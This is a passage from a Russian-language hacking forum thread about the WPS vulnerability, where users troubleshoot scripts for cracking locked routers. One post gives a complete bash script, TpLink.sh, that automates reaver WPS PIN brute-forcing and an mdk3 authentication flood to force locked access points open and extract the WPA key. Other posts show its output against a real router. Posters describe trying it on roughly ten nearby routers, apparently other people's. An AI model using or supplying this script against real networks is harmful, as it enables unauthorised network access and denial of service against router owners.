Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,659
    Likes Received:
    9,960
    Reputations:
    123
    Возможно скрипт ReVdk3-r3 не совместим с вашей версией пакета aircrack-ng (или с системой в целом), судя по mon0 она устаревшая.
     
  2. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Затем, что я отвел:

    Это ReVdK3-r3.sh. Что касается скрпита VladimirV который выложен парой страниц назад, у меня он бесполезен, на залоченных точках, пишет "not associates". Что тут не понятного?
     
  3. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    WifiSLAX v4.12. aircrack-ng последней сборки.
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,659
    Likes Received:
    9,960
    Reputations:
    123
    Во всяком случае, вот что в исходнике:
    Code:
    read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN;
    EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
    while [ -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
    echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
    
    Единственное, что меня в нём смущает - это две одинарные кавычки после grep.
     
  5. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Code:
    AP XX:XX:XX:XX:XX:XX seems to be INVULNERABLE! 
    Device is still responding with  7000 clients connected!
    И так на всех роутерах, в чем беда?
     
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,659
    Likes Received:
    9,960
    Reputations:
    123
    Они читерят, используя режим неуязвимости.
     
    Triton_Mgn likes this.
  7. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    И что с ними теперь делать?
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,659
    Likes Received:
    9,960
    Reputations:
    123
    Понять и простить. Ну или попробовать другим адаптером.
     
    toexc and Triton_Mgn like this.
  9. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Затёр, но тоже не помогло. Жаль, что бесполезные скрипты, не работает ни один, ни второй.
     
    #3849 Algierd, 2 Feb 2017
    Last edited: 2 Feb 2017
  10. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Другого нет :( И проблема в том, что просто на всех (штук 5 попробовал) такое сообщение
     
    #3850 carartem02, 2 Feb 2017
    Last edited: 2 Feb 2017
  11. grek-6630

    grek-6630 New Member

    Joined:
    16 Feb 2016
    Messages:
    36
    Likes Received:
    3
    Reputations:
    0
    Добрый вечер,у меня такая проблема точка лоченая TP-Link. Поместил папку со скриптом в домашнюю папку,далее вот...
    root@kali:~# airmon-ng

    PHY Interface Driver Chipset

    phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
    phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

    root@kali:~# airmon-ng start wlan1


    PHY Interface Driver Chipset

    phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
    phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

    (mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
    (mac80211 station mode vif disabled for [phy2]wlan1)

    root@kali:~# cd TpLink/
    root@kali:~/TpLink# chmod +x TpLink.sh
    root@kali:~/TpLink# ./TpLink.sh 84:16:F9:9D:07:7A wlan1mon
    ./tmp/84:16:F9:9D:07:7A
    BSSID = 84:16:F9:9D:07:7A
    [+] reaver is working ...
    [-] Failed to retrieve a MAC address for interface 'mon0'!
    [-] not associated
    [-] not associated
    [-] not associated

    и так без конца,может я что то не так сделал? Меня смущает [-] Failed to retrieve a MAC address for interface 'mon0'!
    Помогите кто чем может.
     
  12. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Смени на wlan1mon. Если не знаешь, вот
    Code:
    #!/bin/bash
    
    BSSID=$1
    WPSPIN=""
    WPAPSK=""
    name_interface=$2
    Work_reaver=20
    tmp_path=`dirname $0`/tmp/$BSSID
    echo $tmp_path
    
    
    print_example (){
    echo "Example usage: TpLink.sh BSSID interface";
    echo "Example usage: TpLink.sh FF:FF:FF:FF:FF:FF wlan0mon";
    }
    
    
    if [ "$1" == "" ]
      then
      print_example
      exit 1
      fi
    if [ "$2" == "" ]
      then
      echo "No interface, using wlan1mon"
      name_interface="wlan1mon"
      fi
    echo "BSSID = $BSSID"
    echo "Interface = $name_interface"
    #echo "" > "$tmp_path.txt"
    
    
    
    trap 'echo "Wait exit reaver"; kill_reaver; exit 1' 2
    
    kill_reaver (){
    killall -s INT -w reaver;
    }
    
    run_MDK3 (){
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 $name_interface a -a $BSSID -m"
    sleep 6
    killall mdk3 2> /dev/null
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
    sleep 5
    }
    
    wait_associated (){
    Ass=""
    while [ "$Ass" == "" ]
    do
    sleep 2
    Ass=`grep "Associated with" "$tmp_path.txt"`
      if [ "$Ass" == "" ]
      then echo [-] not associated
      else echo $Ass
      fi
    done
    
    }
    
    while [ "$WPSPIN" == "" ]
    do
    echo [+] reaver is working ...
    echo "" > $tmp_path.txt
    reaver -i $name_interface -b $BSSID -n -v -L -s "$tmp_path.wpc" > "$tmp_path.txt" &
    ReaverID=$!
    disown $ReaverID  
    
    wait_associated
    
    for (( counter=1; counter<$Work_reaver; counter++ ))
       do
        sleep 2
       if [ "$WPSPIN" == "" ]
      then
        WPSPIN=`grep "WPS PIN" "$tmp_path.txt"`
        WPAPSK=`grep "WPA PSK" "$tmp_path.txt"`
       else break
       fi
       done
    
    TRYPIN=`grep "Trying pin" "$tmp_path.txt" | grep -oE "[[:digit:]]{8}"`
    
    echo "Pins"
    echo "$TRYPIN"
    
    kill_reaver
    
    # Run mdk3 to work ...
    if [ "$WPSPIN" == "" ]
    then run_MDK3
    fi
    done
    
    echo "[+] Done..."
    echo "$WPSPIN"
    echo "$WPAPSK"
    echo to interrupt script [Ctrl+C]
    while true
    do
    sleep 3
    done
    
    Запускай вот так - TpLink.sh BSSID interface
    ps добавил возможность выбора интерфейса, чтобы руками не менять каждый раз
     
    #3852 carartem02, 2 Feb 2017
    Last edited: 2 Feb 2017
    grek-6630 likes this.
  13. g-n0m_ru

    g-n0m_ru New Member

    Joined:
    18 Jan 2017
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Скрипт ReVdk не работает на Kali linux версии выше 1.0 так как airmon-ng был пере патрашен... этот скрипт работает и уже присутствует в сборках Wislax
     
  14. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Странно, а на сайте есть версия r3 для кали 2 (знаю то,что уже 2016 есть, но всё же)
     
  15. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Для чего вообще нужны эти скрипты если ими нельзя подключитя ни к одной залоченной точке доступа? Типа если заблокируется, nо md3 якобы снимет блокировку? Честно говоря, ещё ни разу не видел ни одного нового роутера который бы хоть как-то реагировал на эту штуку. Да и если надо руками запустить атаку не проблема ведь, смысла в этом только нет...
     
  16. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Я 2-3 года назад спокойно дудосил свой роутер, интернет на нём пропадал. (а может даже и перезагружался)
    PS mdk3. Да и скрипта, который всё взломает тоже нет
     
  17. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Это ещё хорошо если из 10 маршрутизаторов 1 такой попадётся. У меня из примерно 10 роутров рядом эта mdk3 вообще до лампочки.
     
  18. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Лично у меня половина роутеров с WPS падает (pixie+3wifi) и без всяких mdk3.
     
  19. g-n0m_ru

    g-n0m_ru New Member

    Joined:
    18 Jan 2017
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Там печенька вот в чем в старой верси кали airmon-ng воспринимал mon0 в новой же кали виртуальный интерфес обозначается как wlan0mon а скрипт написан под mon0 вот и все дела ставь на виртуалку Kali linux и wislax и всего делов то ....
     
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,659
    Likes Received:
    9,960
    Reputations:
    123
    Проще скрипт переписать / доработать до поддержки двух типов интерфейсов.
     
Loading...